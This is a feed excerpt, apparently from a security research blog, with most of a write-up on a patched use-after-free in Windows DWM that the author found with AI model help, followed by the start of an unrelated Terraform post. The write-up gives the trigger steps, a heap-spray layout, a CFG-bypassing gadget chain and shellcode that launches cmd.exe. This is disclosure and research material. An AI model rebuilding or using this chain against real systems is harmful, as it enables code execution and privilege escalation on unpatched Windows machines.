  FUN_1802e7842                         FUN_1802e7842                           0.1191   0.0632
  FUN_1802e92d6                         FUN_1802e92d6                           0.1470   0.0722
  FUN_1802e5faa                         FUN_1802e5faa                           0.1741   0.0769
  ~CDelegatedInkCanvas                  ~CDelegatedInkCanvas                    0.7556   0.6047
  GetBufferedOutputTransformed          GetBufferedOutputTransformed            0.7628   0.6154
  FrameStarted                          FrameStarted                            0.7833   0.6429
  ~CSynchronousSuperWetInk              ~CSynchronousSuperWetInk                0.8018   0.6667
  FUN_1802f5aa2                         FUN_1802f5aa2                           0.9127   0.8393
  FUN_1802f57d2                         FUN_1802f5d72                           0.9127   0.8393
======================================================================
</code></pre>
<p>From here, I have to say that the time to build a functional exploit was painfully slower than I would have hoped. I spent many long nights and weekends poking and prodding the model along. A lot of this came down to my own unfamiliarity with the bug class and subsystem. Eventually, we did prevail and get RCE from low privilege into DWM and to SYSTEM. In the process, I discovered multiple novel exploitation techniques, like the GetRECT spray, new gadget chains, and a DWM-to-SYSTEM path. However, with these techniques (and some other tooling) in hand and newer model releases like Opus 4.6, the time from discovering a UAF vulnerability in DWM to functional exploit dropped from 3 weeks to a matter of hours.</p>
<h2>The Bug</h2>
<p>The vulnerability is a Use-After-Free in <code>CSynchronousSuperWetInk::~CSynchronousSuperWetInk</code>. The destructor conditionally removes the object from <code>CSuperWetInkManager</code> based on the return value of <code>IsSuperWetCompatible()</code>.</p>
<pre><code class="language-c">void CSynchronousSuperWetInk::~CSynchronousSuperWetInk(CSynchronousSuperWetInk *this) {
    this-&gt;vtable = &amp;_vftable_;
    bool bVar2 = IsSuperWetCompatible(this);
    if (bVar2) {
        CSuperWetInkManager::RemoveSource(this-&gt;composition-&gt;superWetInkManager, this);
    }
    // ... cleanup continues
}
</code></pre>
<p><em>The vulnerable destructor in dwmcore.dll version 10.0.26100.7309.</em></p>
<h3>IsSuperWetCompatible Condition</h3>
<pre><code class="language-c">bool CSynchronousSuperWetInk::IsSuperWetCompatible(CSynchronousSuperWetInk *this) {
    if ((this-&gt;LookupMode == 2 || this-&gt;notifier1 != NULL) &amp;&amp;
        this-&gt;clipEntry != NULL &amp;&amp; this-&gt;comObject != NULL) {
        return true;
    }
    return false;
}
</code></pre>
<p><em>The IsSuperWetCompatible condition in dwmcore.dll version 10.0.26100.7309.</em></p>
<p>The function returns <code>true</code> only when <code>LookupMode</code> equals 2, or <code>notifier1</code> is set, AND both <code>clipEntry</code> and <code>comObject</code> are non-null.</p>
<h3>The Bug</h3>
<p>An attacker can:</p>
<ol>
<li>Register a <code>CSynchronousSuperWetInk</code> with the manager (requires <code>LookupMode=2</code> during <code>Draw()</code>)</li>
<li>Change <code>LookupMode</code> to 0 via <code>CMD_SET_PROPERTY</code></li>
<li>Trigger destruction via <code>CMD_RELEASE_RESOURCE</code></li>
<li><code>IsSuperWetCompatible()</code> returns FALSE → <code>RemoveSource()</code> is <strong>skipped</strong></li>
<li>A dangling pointer remains in <code>CSuperWetInkManager::localStrokesVector</code></li>
</ol>
<p>When DWM later iterates this vector (e.g., in <code>DirtyActiveInk</code>), it dereferences the freed object's vtable, leading to controlled code execution.</p>
<h3>The Fix</h3>
<p>The patch adds a feature flag (<code>Feature_1732988217</code>). When enabled, <code>RemoveSource()</code> is called <strong>unconditionally</strong>, regardless of <code>IsSuperWetCompatible()</code>. This ensures the object is always properly unregistered from the manager during destruction, eliminating the dangling pointer.</p>
<pre><code class="language-c">void CSynchronousSuperWetInk::~CSynchronousSuperWetInk(CSynchronousSuperWetInk *this) {
    *(undefined ***)this = &amp;_vftable_;
    bool bVar2 = wil::details::FeatureImpl&lt;Feature_1732988217&gt;::__private_IsEnabled(&amp;impl);
    if (!bVar2) {
        bVar2 = IsSuperWetCompatible(this);
        if (!bVar2) goto LAB_1802a9b1a;  // Skip RemoveSource only if feature disabled AND !compatible
    }
    CSuperWetInkManager::RemoveSource(..., this);
LAB_1802a9b1a:
    // ... cleanup continues
}
</code></pre>
<p><em>The fixed destructor in dwmcore.dll version 10.0.26100.7623.</em></p>
<h2>The Exploit</h2>
<p>The UAF can be triggered from a regular user-mode application via the <a href="https://learn.microsoft.com/en-us/windows/win32/directcomp/directcomposition-portal">DirectComposition API</a>. The attack requires no special privileges.</p>
<h3>Prerequisites</h3>
<ol>
<li><strong>D3D11/DXGI Infrastructure</strong>: Create a D3D11 device with BGRA support and a swap chain for a visible window.</li>
<li><strong>DirectComposition Device</strong>: Initialize via <code>DCompositionCreateDevice()</code> with the DXGI device.</li>
<li><strong>NtDComposition Syscall Access</strong>: Hook or directly call <code>NtDCompositionProcessChannelBatchBuffer</code> and <code>NtDCompositionCommitChannel</code> via <code>win32u.dll</code> to inject raw batch buffer commands.</li>
</ol>
<h3>Trigger Sequence</h3>
<h4>Step 1: Create Ink Trail (Allocate CSynchronousSuperWetInk)</h4>
<p>Query <code>IDCompositionInkTrailDevice</code> from the DirectComposition device, then call <code>CreateDelegatedInkTrailForSwapChain()</code> or <code>CreateDelegatedInkTrail()</code>. This allocates a <code>CSynchronousSuperWetInk</code> object (resource type <code>0xa8</code>) in dwm.exe's heap.</p>
<h4>Step 2: Create Visual and Set LookupMode=2</h4>
<p>Inject batch buffer commands to:</p>
<ol>
<li>Create a <code>CSuperWetInkVisual</code> (type <code>0xa5</code>) with <code>CMD_CREATE_RESOURCE</code> (0x02)</li>
<li>Connect visual to ink source: <code>CMD_SET_REFERENCE</code> (0x10) with propId <code>0x34</code></li>
<li>Set <code>LookupMode=2</code> on the ink source via <code>CMD_SET_PROPERTY</code> (0x0B) with propId <code>10</code></li>
<li>Connect to composition tree: <code>CMD_SET_REFERENCE</code> to handles 1 and 2 (composition target / marshaler) with propId <code>0x34</code></li>
</ol>
<p>LookupMode=2 ensures <code>IsSuperWetCompatible()</code> returns TRUE during <code>Draw()</code>, which registers the object with <code>CSuperWetInkManager::localStrokesVector</code>.</p>
<h4>Step 3: Render Frames to Register with Manager</h4>
<p>Present multiple frames (<code>IDXGISwapChain::Present</code>) and commit DirectComposition changes. This triggers DWM's render loop, which calls into the ink infrastructure and registers the <code>CSynchronousSuperWetInk</code> pointer in the manager's internal vector.</p>
<h4>Step 4: Set LookupMode=0 (Bypass Removal Check)</h4>
<p>Inject <code>CMD_SET_PROPERTY</code> to change <code>LookupMode</code> to <code>0</code>. Now <code>IsSuperWetCompatible()</code> will return FALSE because:</p>
<pre><code class="language-c">if ((this-&gt;LookupMode == 2 || this-&gt;notifier1 != NULL) &amp;&amp; ...)
</code></pre>
<p>With <code>LookupMode</code> = 0 and no notifier, the first condition fails.</p>
<h4>Step 5: Release Ink Trail (Create Dangling Pointer)</h4>
<ol>
<li>Disconnect visual references: <code>CMD_SET_REFERENCE</code> with refHandle=0 for all connections</li>
<li>Release the <code>IDCompositionDelegatedInkTrail</code> interface</li>
</ol>
<p>When the destructor <code>~CSynchronousSuperWetInk</code> runs:</p>
<ul>
<li>It calls <code>IsSuperWetCompatible()</code> which returns <strong>FALSE</strong> (LookupMode=0)</li>
<li><code>RemoveSource()</code> is <strong>SKIPPED</strong></li>
<li>The object is freed but its pointer <strong>remains</strong> in <code>CSuperWetInkManager::localStrokesVector</code></li>
</ul>
<h4>Step 6: Trigger DirtyActiveInk (Use-After-Free)</h4>
<p>Continue presenting frames and invalidating the window. DWM's composition loop calls <code>CSuperWetInkManager::DirtyActiveInk()</code>, which iterates <code>localStrokesVector</code> and dereferences the dangling pointer:</p>
<pre><code class="language-c">pcVar2 = *(code **)((longlong)((CResource *)*puVar4)-&gt;vtable + 0x50);
</code></pre>
<h3>Crash Behavior</h3>
<p>Without a heap spray, DWM crashes when accessing freed memory:</p>
<pre><code> # Call Site
00 ntdll!KiUserExceptionDispatch
01 0x00007ffe`f23270d1
02 dwmcore!CSuperWetInkManager::DirtyActiveInk+0xae
03 dwmcore!CComposition::PreRender+0x99f
04 dwmcore!CComposition::ProcessComposition+0x1d7
05 dwmcore!CConnection::MainCompositionThreadLoop+0x4a
</code></pre>
<p>If the freed memory is reclaimed by another object (e.g., <code>CInteractionTrackerScaleAnimation</code>), the crash occurs at an unexpected vtable:</p>
<pre><code>kd&gt; dps rcx
00000201`fbef65f0  00007ffe`ebf60014 dwmcore!CInteractionTrackerScaleAnimation::`vftable'+0x24
</code></pre>
<p>By controlling what data reclaims the freed allocation, an attacker can craft a fake vtable and achieve arbitrary code execution via the virtual call at <code>vtable+0x50</code>.</p>
<h2>Heap Spray</h2>
<p>To exploit the UAF, we must reclaim the freed <code>CSynchronousSuperWetInk</code> allocation with attacker-controlled data containing a fake vtable. This section documents the CRegionGeometry RECT buffer spray technique we refer to as GetRECT.</p>
<h3>Target Object Properties</h3>
<table>
<thead>
<tr>
<th align="left">Property</th>
<th align="left">Value</th>
</tr>
</thead>
<tbody>
<tr>
<td align="left">Object</td>
<td align="left"><code>CSynchronousSuperWetInk</code></td>
</tr>
<tr>
<td align="left">Size</td>
<td align="left">0x120 (288 bytes)</td>
</tr>
<tr>
<td align="left">Allocator</td>
<td align="left"><code>DefaultHeap::AllocClear</code> → <code>GetProcessHeap()</code></td>
</tr>
<tr>
<td align="left"><a href="https://learn.microsoft.com/en-us/windows/win32/memory/low-fragmentation-heap">LFH</a> Bucket</td>
<td align="left">34 (273-288 byte range)</td>
</tr>
<tr>
<td align="left">Slots per <a href="https://blackhat.com/docs/us-16/materials/us-16-Yason-Windows-10-Segment-Heap-Internals.pdf">Subsegment</a></td>
<td align="left">57</td>
</tr>
</tbody>
</table>
<h3>Spray Primitive: CRegionGeometry RECT Buffer</h3>
<p>The spray uses <code>CRegionGeometry</code> resources (type <code>0x81</code>) with RECT array data:</p>
<table>
<thead>
<tr>
<th align="left">Property</th>
<th align="left">Value</th>
</tr>
</thead>
<tbody>
<tr>
<td align="left">Resource Type</td>
<td align="left"><code>0x81</code> (CRegionGeometry)</td>
</tr>
<tr>
<td align="left">Spray Size</td>
<td align="left">18 RECTs × 16 bytes = <strong>288 bytes</strong></td>
</tr>
<tr>
<td align="left">Allocator</td>
<td align="left"><code>std::_Allocate&lt;16&gt;</code> → <code>HeapAlloc(GetProcessHeap(), 0, 288)</code></td>
</tr>
<tr>
<td align="left">LFH Bucket</td>
<td align="left">34, <strong>same as target</strong></td>
</tr>
<tr>
<td align="left">Content Control</td>
<td align="left">72 int32 values (18 RECTs × 4 fields)</td>
</tr>
</tbody>
</table>
<p><strong>Allocation Chain</strong>:</p>
<pre><code>dcomp.dll:   SetRectangles → ResourceSetBufferPropertyCustomWrite
win32kbase:  CRegionGeometryMarshaler::SetBufferProperty → CMarshaledArray::Copy
dwmcore.dll: SetRectangles → std::vector::_Insert_counted_range
             → std::_Allocate&lt;16&gt; → HeapAlloc(GetProcessHeap(), 0, 288)
</code></pre>
<p>The RECT buffer is written via <code>CMD_SET_BUFFER_PROPERTY</code> (0x0F) with propId <code>5</code>:</p>
<pre><code class="language-c">struct CmdSetResourceBufferProperty {
    uint32_t cmdId;      // 0x0F
    uint32_t handle;     // Resource handle
    uint32_t propId;     // 5 for RECT array
    uint32_t dataSize;   // 288 for 18 RECTs
    // Variable-length RECT data follows (4-byte aligned)
};
</code></pre>
<h3>RECT Layout for Fake Object</h3>
<p>The 18 RECTs (288 bytes) provide full control over the reclaimed memory:</p>
<pre><code class="language-c">struct SprayRECT {
    int32_t left;    // +0x00 within RECT
    int32_t top;     // +0x04
    int32_t right;   // +0x08
    int32_t bottom;  // +0x0C
};
// Total: 72 int32 values = complete coverage of CSynchronousSuperWetInk fields

// Key offsets for exploit:
// +0x00: fake vtable pointer (RECT[0].left/top)
</code></pre>
<p>Helper to write 64-bit values into adjacent RECT fields:</p>
<pre><code class="language-c">static void SetU64(int32_t* lo, int32_t* hi, uint64_t val) {
    *lo = (int32_t)(val &amp; 0xFFFFFFFF);
    *hi = (int32_t)(val &gt;&gt; 32);
}
</code></pre>
<h3>Exploitation Primitive</h3>
<p>The UAF gives us a <strong>controlled vtable call with RCX pointing to our sprayed object</strong>. When <code>DirtyActiveInk</code> iterates the dangling pointer:</p>
<pre><code class="language-c">pcVar2 = *(code **)((longlong)((CResource *)*puVar4)-&gt;vtable + 0x50);
(*pcVar2)();  // call [[spray]+0x50] with RCX = spray
</code></pre>
<p><strong>Call site stack:</strong></p>
<pre><code>00 dwmcore!CSuperWetInkManager::DirtyActiveInk+0xa9
01 dwmcore!CComposition::PreRender+0x99f
02 dwmcore!CComposition::ProcessComposition+0x1d7
03 dwmcore!CConnection::MainCompositionThreadLoop+0x4a
04 dwmcore!CConnection::RunCompositionThread+0x142
05 KERNEL32!BaseThreadInitThunk+0x17
06 ntdll!RtlUserThreadStart+0x2c
</code></pre>
<p><strong>Register state at dispatch:</strong></p>
<ul>
<li><code>RCX</code> = pointer to sprayed object (our controlled 288 bytes)</li>
<li><code>RIP</code> = <code>[[spray]+0x50]</code> (function pointer from fake vtable)</li>
</ul>
<h3>Target Function Constraints</h3>
<p>There are initially two restrictions on what we can call:</p>
<ol>
<li>The target must be <strong>in the CFG bitmap</strong> (marked as valid call target)</li>
<li>The target must have a <strong>pointer to it</strong> (in IAT, vtable, or other readable memory)</li>
</ol>
<p>We cannot directly call arbitrary addresses; only functions that satisfy both conditions.</p>
<h3>Gadget Chain: __fnINSTRING + CStdAsyncStubBuffer2_Disconnect</h3>
<p>With the UAF giving us a controlled vtable call (<code>RIP = [[spray]+0x50]</code>, <code>RCX = spray</code>), the remaining challenge is chaining CFG-valid gadgets to achieve arbitrary code execution. Direct shellcode execution is blocked by CFG, and we have no heap address leak. We developed a novel gadget chain that solves both problems to achieve code execution, but it required 2 successful exploit attempts, lowering the reliability. Therefore, we pivoted to a <a href="https://ti.qianxin.com/blog/articles/public-secret-research-on-the-cve-2024-30051-privilege-escalation-vulnerability-in-the-wild-en/">known public</a> technique using two Windows system DLL gadgets: <code>__fnINSTRING</code> (user32.dll) and <code>CStdAsyncStubBuffer2_Disconnect</code> (combase.dll).</p>
<h4>Stage 1: __fnINSTRING - Kernel Callback Dispatch Without a Leak</h4>
<p>The Windows kernel communicates back to user mode through the <code>KernelCallbackTable</code> (KCT), a function pointer table stored in the PEB at offset <code>+0x58</code>. Each entry points to a <code>__fn*</code> handler in <code>user32.dll</code>. These functions are CFG-valid call targets and have pointers to them in readable memory (the KCT itself), satisfying both constraints.</p>
<p>We point the fake vtable at <code>&amp;KCT[fnINSTRING_index] - 0x50</code>. When DirtyActiveInk dereferences <code>[[spray]+0x50]</code>, it reads the KCT entry and dispatches to <code>__fnINSTRING</code>:</p>
<pre><code>[[spray]+0x50]
  = [KCT_entry_addr - 0x50 + 0x50]
  = [KCT_entry_addr]
  = &amp;__fnINSTRING
</code></pre>
<p>What makes this useful is what <code>__fnINSTRING</code> does internally. It treats its argument (our spray buffer) as a <code>_CAPTUREBUF</code> structure and calls <code>FixupCallbackPointers</code> before dispatching the inner function. <code>FixupCallbackPointers</code> reads a fixup table from the buffer and converts relative offsets into absolute addresses by adding the buffer's base address:</p>
<pre><code class="language-c">// Simplified FixupCallbackPointers logic:
void FixupCallbackPointers(_CAPTUREBUF* buf) {
    if (buf-&gt;guard != 0) return;  // already fixed up - skip
    int32_t* fixups = (int32_t*)((char*)buf + buf-&gt;fixupTableOffset);
    for (int i = 0; i &lt; buf-&gt;fixupCount; i++) {
        int32_t* target = (int32_t*)((char*)buf + fixups[i]);
        *(uint64_t*)target += (uint64_t)buf;  // relative → absolute
    }
}
</code></pre>
<p>This eliminates the need for a heap address leak. We embed relative offsets in the spray buffer, and <code>FixupCallbackPointers</code> patches them to absolute pointers at runtime using the buffer's own address. After fixup, <code>__fnINSTRING</code> dispatches the inner function pointer at <code>+0x48</code> with the arguments at <code>+0x28</code> (RCX), <code>+0x30</code> (EDX), <code>+0x38</code> (R8), and <code>+0x50</code> (R9).</p>
<p>We set the inner function to <code>CStdAsyncStubBuffer2_Disconnect</code>.</p>
<h4>Stage 2: CStdAsyncStubBuffer2_Disconnect - Two Chained Vtable Calls</h4>
<p><code>CStdAsyncStubBuffer2_Disconnect</code> is exported from <code>combase.dll</code>, making it CFG-valid with a stable address. Its disassembly reveals a useful primitive: two sequential vtable dispatches with preserved argument registers:</p>
<pre><code>; CStdAsyncStubBuffer2_Disconnect (simplified)
MOV  RBX, RCX             ; save this
MOV  RCX, [RCX-8]         ; load [this-8] -&gt; fake_obj_1
TEST RCX, RCX
JZ   skip1
MOV  RAX, [RCX]           ; vtable
MOV  RAX, [RAX+0x20]      ; vtable[4]
CALL guard_dispatch_icall  ; CALL #1: [[this-8]+0x20]  ← VirtualProtect

skip1:
XOR  ECX, ECX
XCHG [RBX+0x10], RCX      ; DEFUSE: read [this+0x10], zero it
TEST RCX, RCX
JZ   skip2
MOV  RAX, [RCX]           ; vtable
MOV  RAX, [RAX+0x10]      ; vtable[2]
CALL guard_dispatch_icall  ; CALL #2: [[[this+0x10]]+0x10]  ← shellcode

skip2:
ADD  RSP, 0x20
POP  RBX
RET
</code></pre>
<p><code>RDX</code>, <code>R8</code>, and <code>R9</code> are <strong>preserved through both calls</strong>, arriving untouched from <code>__fnINSTRING</code>'s argument setup. This gives us full control over the first three arguments to both vtable calls.</p>
<h4>Vtable Call #1: VirtualProtect → RWX</h4>
<p>We construct a self-referential fake object at <code>+0xC8</code> in the spray buffer: <code>[+0xC8]</code> points to itself (after fixup), so dereferencing <code>[RCX] → [RCX+0x20]</code> reads <code>VirtualProtect</code>'s address from <code>+0xE8</code>. The arguments (preserved from <code>__fnINSTRING</code> dispatch) are:</p>
<table>
<thead>
<tr>
<th align="left">Register</th>
<th align="left">Value</th>
<th align="left">Purpose</th>
</tr>
</thead>
<tbody>
<tr>
<td align="left">RCX</td>
<td align="left">base+0xC8 (fake_obj_1)</td>
<td align="left">lpAddress (start of spray buffer region)</td>
</tr>
<tr>
<td align="left">RDX</td>
<td align="left">0x1000</td>
<td align="left">dwSize</td>
</tr>
<tr>
<td align="left">R8</td>
<td align="left">0x40</td>
<td align="left">flNewProtect (<code>PAGE_EXECUTE_READWRITE</code>)</td>
</tr>
<tr>
<td align="left">R9</td>
<td align="left">base+0xC0</td>
<td align="left">lpflOldProtect (output slot in spray buffer)</td>
</tr>
</tbody>
</table>
<p>After this call, the spray buffer's memory page is marked RWX, and the CFG bitmap is updated to allow execution from this region.</p>
<h4>Vtable Call #2: Inline Shellcode</h4>
<p>After VirtualProtect returns, Disconnect loads <code>[this+0x10]</code> into RCX for the second vtable dispatch:</p>
<pre><code>XOR  ECX, ECX
XCHG [RBX+0x10], RCX      ; RCX = [base+0x90] = base+0xA0 (fake_obj_2)
TEST RCX, RCX
JZ   skip2                 ; non-zero → take the call
MOV  RAX, [RCX]            ; RAX = [base+0xA0] = base+0xA8 (fake vtable_2)
MOV  RAX, [RAX+0x10]       ; RAX = [base+0xB8] = base+0xD0 (shellcode!)
CALL guard_dispatch_icall   ; call base+0xD0
</code></pre>
<p>The pointer chain resolves step by step:</p>
<ol>
<li><code>[this+0x10]</code> = <code>[base+0x90]</code> = <code>base+0xA0</code> (fake_obj_2)</li>
<li><code>[RCX]</code> = <code>[base+0xA0]</code> = <code>base+0xA8</code>, fake_obj_2's vtable pointer (after fixup)</li>
<li><code>[RAX+0x10]</code> = <code>[base+0xB8]</code> = <code>base+0xD0</code>, vtable_2's third entry, pointing at our shellcode</li>
</ol>
<p>The final <code>CALL guard_dispatch_icall</code> dispatches to <code>base+0xD0</code>, our inline shellcode, now both executable and CFG-valid thanks to the preceding VirtualProtect call.</p>
<h5>Shellcode Layout</h5>
<p>The shellcode is split into two phases because the VirtualProtect address data sits at <code>+0xE8</code> (used as <code>vtable_1[0x20]</code> by call #1), creating a gap in the middle of our executable region:</p>
<p><strong>Phase 1 (+0xD0, 22 bytes):</strong> Saves <code>RCX</code> (base+0xA0) into <code>RBX</code> for later address arithmetic, allocates shadow space, loads <code>SW_SHOW</code> (5) into <code>RDX</code>, loads the absolute address of <code>WinExec</code> via <code>movabs RAX</code>, then jumps over the 8-byte data gap at <code>+0xE8</code>:</p>
<pre><code>mov  rbx, rcx              ; save base+0xA0 for address math
sub  rsp, 0x28             ; shadow space
push 5
pop  rdx                   ; uCmdShow = SW_SHOW
movabs rax, &lt;WinExec addr&gt; ; 10-byte immediate load
jmp  +0x0A                 ; skip over +0xE8 data → land at +0xF0
</code></pre>
<p><strong>Phase 2 (+0xF0):</strong> Calls <code>WinExec</code> with a <code>RIP</code>-relative pointer to the <code>&quot;cmd.exe\0&quot;</code> string embedded at the end of the shellcode, defuses the spray for safe re-entry, then performs a stack fixup to return directly to DWM's composition loop:</p>
<pre><code>lea  rcx, [rip+0x22]      ; rcx = &amp;&quot;cmd.exe&quot;
call rax                   ; WinExec(&quot;cmd.exe&quot;, SW_SHOW)

; Defuse: rewrite fake vtable so re-entry is harmless
lea  rax, [rbx+0x78]       ; rax = address of the ret below
mov  [rbx-0x48], rax       ; [base+0x58] = ret_gadget
lea  rax, [rbx-0x98]       ; rax = base+0x08
mov  [rbx-0xA0], rax       ; [base+0x00] = base+0x08 (new fake vtable)

; Stack fixup: skip Disconnect + __fnINSTRING return frames
add  rsp, 0xB8             ; 0x28 shadow + 0x90 to unwind past intermediate frames
xor  eax, eax              ; zero return value
ret                        ; return directly to DWM composition loop
; &quot;cmd.exe\0&quot; embedded here
</code></pre>
<p>The <code>add rsp, 0xB8</code> improves reliability. A naive <code>add rsp, 0x28</code> would return into <code>CStdAsyncStubBuffer2_Disconnect</code>, which would then return into <code>__fnINSTRING</code>, which calls <code>NtCallbackReturn</code>. This kernel callback return path can be fragile in the context of a hijacked call. By adding an extra <code>0x90</code> to the stack adjustment, the shellcode skips past both intermediate frames entirely and returns directly to <code>DirtyActiveInk</code>'s caller in the DWM composition loop.</p>
<h4>Safe Re-entry: Defusing the Spray</h4>
<p>DWM's <code>DirtyActiveInk</code> may iterate the dangling pointer more than once. Without defusing, each re-entry would re-trigger the full chain and crash. The shellcode rewrites the spray's vtable pointer so that subsequent dereferences take a harmless path:</p>
<ol>
<li><code>[base+0x00]</code> is overwritten to <code>base+0x08</code> (new fake vtable)</li>
<li><code>[base+0x58]</code> is overwritten to the address of a <code>ret</code> instruction</li>
</ol>
<p>On re-entry: <code>[[base+0x00]+0x50] = [base+0x08+0x50] = [base+0x58] = ret</code>. The vtable call returns immediately. <code>__fnINSTRING</code> is never re-invoked because the vtable no longer points at the KCT entry.</p>
<h3>Complete Spray Layout</h3>
<p>The full 288-byte spray buffer (18 RECTs) after <code>FixupCallbackPointers</code>:</p>
<table>
<thead>
<tr>
<th align="left">Offset</th>
<th align="left">Size</th>
<th align="left">Content</th>
<th align="left">Purpose</th>
</tr>
</thead>
<tbody>
<tr>
<td align="left">+0x00</td>
<td align="left">8</td>
<td align="left">KCT_entry - 0x50</td>
<td align="left">Fake vtable → <code>__fnINSTRING</code></td>
</tr>
<tr>
<td align="left">+0x08</td>
<td align="left">4</td>
<td align="left">8</td>
<td align="left">Fixup count</td>
</tr>
<tr>
<td align="left">+0x18</td>
<td align="left">4</td>
<td align="left">0x58</td>
<td align="left">Fixup table offset</td>
</tr>
<tr>
<td align="left">+0x20</td>
<td align="left">8</td>
<td align="left">base (fixup'd)</td>
<td align="left">Guard (blocks re-fixup)</td>
</tr>
<tr>
<td align="left">+0x28</td>
<td align="left">8</td>
<td align="left">base+0x80 (fixup'd)</td>
<td align="left">RCX → Disconnect <code>this</code></td>
</tr>
<tr>
<td align="left">+0x30</td>
<td align="left">4</td>
<td align="left">0x1000</td>
<td align="left">EDX → VirtualProtect <code>dwSize</code></td>
</tr>
<tr>
<td align="left">+0x38</td>
<td align="left">8</td>
<td align="left">0x40</td>
<td align="left">R8 → PAGE_EXECUTE_READWRITE</td>
</tr>
<tr>
<td align="left">+0x48</td>
<td align="left">8</td>
<td align="left">&amp;Disconnect</td>
<td align="left">Inner function pointer</td>
</tr>
<tr>
<td align="left">+0x50</td>
<td align="left">8</td>
<td align="left">base+0xC0 (fixup'd)</td>
<td align="left">R9 → <code>lpflOldProtect</code></td>
</tr>
<tr>
<td align="left">+0x58</td>
<td align="left">32</td>
<td align="left">fixup table (8 entries)</td>
<td align="left">Offsets to patch</td>
</tr>
<tr>
<td align="left">+0x78</td>
<td align="left">8</td>
<td align="left">base+0xC8 (fixup'd)</td>
<td align="left">[this-8] → fake_obj_1</td>
</tr>
<tr>
<td align="left">+0x80</td>
<td align="left">8</td>
<td align="left">(unused)</td>
<td align="left">Disconnect <code>this</code> base</td>
</tr>
<tr>
<td align="left">+0x90</td>
<td align="left">8</td>
<td align="left">base+0xA0 (fixup'd)</td>
<td align="left">[this+0x10] → fake_obj_2</td>
</tr>
<tr>
<td align="left">+0xA0</td>
<td align="left">8</td>
<td align="left">base+0xA8 (fixup'd)</td>
<td align="left">fake_obj_2 vtable</td>
</tr>
<tr>
<td align="left">+0xB8</td>
<td align="left">8</td>
<td align="left">base+0xD0 (fixup'd)</td>
<td align="left">vtable_2[0x10] → shellcode</td>
</tr>
<tr>
<td align="left">+0xC0</td>
<td align="left">4</td>
<td align="left">(output)</td>
<td align="left">VirtualProtect <code>lpflOldProtect</code></td>
</tr>
<tr>
<td align="left">+0xC8</td>
<td align="left">8</td>
<td align="left">base+0xC8 (fixup'd)</td>
<td align="left">Self-referential vtable (fake_obj_1)</td>
</tr>
<tr>
<td align="left">+0xD0</td>
<td align="left">22</td>
<td align="left">shellcode phase 1</td>
<td align="left">Save regs, load WinExec, jmp</td>
</tr>
<tr>
<td align="left">+0xE8</td>
<td align="left">8</td>
<td align="left">&amp;VirtualProtect</td>
<td align="left">vtable_1[0x20] data</td>
</tr>
<tr>
<td align="left">+0xF0</td>
<td align="left">48</td>
<td align="left">shellcode phase 2</td>
<td align="left">WinExec + defuse + stack fixup + &quot;cmd.exe\0&quot;</td>
</tr>
</tbody>
</table>
<h3>Full Chain Summary</h3>
<pre><code>DirtyActiveInk iterates dangling pointer
  → [[spray+0x00]+0x50] = __fnINSTRING(spray)
    → FixupCallbackPointers: 8 relative offsets → absolute
    → Dispatch: CStdAsyncStubBuffer2_Disconnect(base+0x80, 0x1000, 0x40, base+0xC0)
      → Vtable call #1: VirtualProtect(base+0xC8, 0x1000, RWX, base+0xC0)
        → Spray buffer page is now RWX, CFG bitmap updated
      → Vtable call #2: shellcode at base+0xD0
        → WinExec(&quot;cmd.exe&quot;, SW_SHOW)
        → Defuse: rewrite vtable for safe re-entry
        → Stack fixup: add rsp, 0xB8 to skip Disconnect + __fnINSTRING frames
      → RET directly to DWM composition loop
    → DirtyActiveInk re-entry: [[base]+0x50] = ret → clean return
</code></pre>
<p>The DWM process runs as the DWM user with System integrity. Prior <a href="https://ti.qianxin.com/blog/articles/public-secret-research-on-the-cve-2024-30051-privilege-escalation-vulnerability-in-the-wild-en/">public techniques</a> to achieve SYSTEM typically involve hijacking function pointers mapped into privileged client processes like LogonUI or Consent. However, it appears this technique was recently patched as the shared section is now mapped read-only. We developed a new, alternative path to SYSTEM but are choosing to withhold publishing the technique at this time.</p>
&lt;div className=&quot;youtube-video-container&quot;&gt;
  &lt;iframe src=&quot;https://www.youtube.com/embed/SR4242l_kw0?si=lIQFQ8xThl_Nmt0w&quot; title=&quot;YouTube video player&quot; allow=&quot;fullscreen; accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share&quot; referrerPolicy=&quot;strict-origin-when-cross-origin&quot; allowFullScreen&gt;&lt;/iframe&gt;
&lt;/div&gt;
<h2>Closing Thoughts</h2>
<p>The models we have today are highly capable at tasks that historically have required deep expertise cultivated over many years. This includes things like reverse engineering, vulnerability discovery, and exploit development. Their capabilities are spiky, and do not yet rival the world's best in these fields. However, the march of model progress seems to show no sign of slowing down at the moment. This levels the playing field for defenders, but also raises the capabilities of attackers. While there has always been an adversarial cat and mouse game, and this is not new in that regard, attackers are at least at a near-term asymmetric advantage to wield these tools for harm. Attackers can move faster, with little worry about safety or security of AI systems. Defenders must leverage AI for offensive purposes against their code (for vulnerabilities), security products (for detection gaps), and their enterprises (adversary emulation) to find weaknesses and iterate on improved defenses before attackers do. Unfortunately, it may be the small organizations with no security teams that take the brunt of the near term pain. My hope is that long-term, the security community can together outspend attackers on offensive and defensive research, and we exit this era in a better place than we started.</p>
]]></content:encoded>
            <category>security-labs</category>
            <enclosure url="https://www.elastic.co/kr/security-labs/assets/images/patch-diff-to-system/patch-diff-to-system.png" length="0" type="image/png"/>
        </item>
        <item>
            <title><![CDATA[Manage your Elastic security stack as code with the Elastic Stack Terraform provider]]></title>
            <link>https://www.elastic.co/kr/security-labs/manage-elastic-with-terraform</link>
            <guid>manage-elastic-with-terraform</guid>
            <pubDate>Fri, 27 Feb 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[From detection rules to AI connectors - the latest Terraform provider releases bring security, observability, and ML capabilities to your infrastructure-as-code workflows.]]></description>
            <content:encoded><![CDATA[<p>The <a href="https://registry.terraform.io/providers/elastic/elasticstack/latest/docs">Elastic Stack Terraform provider</a> has reached a significant milestone. Starting with release v0.13.1, you can manage your Elastic security posture - detection rules, exception lists, and prebuilt rules - alongside ML anomaly detection jobs, synthetics monitors, and AI connectors, all as code.</p>
<p>This brings your detection logic and ML jobs into the same versioned, peer-reviewed workflow as your core clusters. It ensures your security posture and AI connectors are no longer manual outliers in an otherwise automated environment.</p>
<h2>The challenge: Security and observability configuration at scale</h2>
<p>As Elastic deployments grow, so does the complexity of managing them. Security teams maintain hundreds of detection rules. SREs configure monitoring across dozens of clusters. ML engineers tune anomaly detection jobs across multiple environments. All of these configurations must be consistent, auditable, and reproducible.</p>
<p>Without infrastructure as code, teams face two problems:</p>
<ol>
<li>
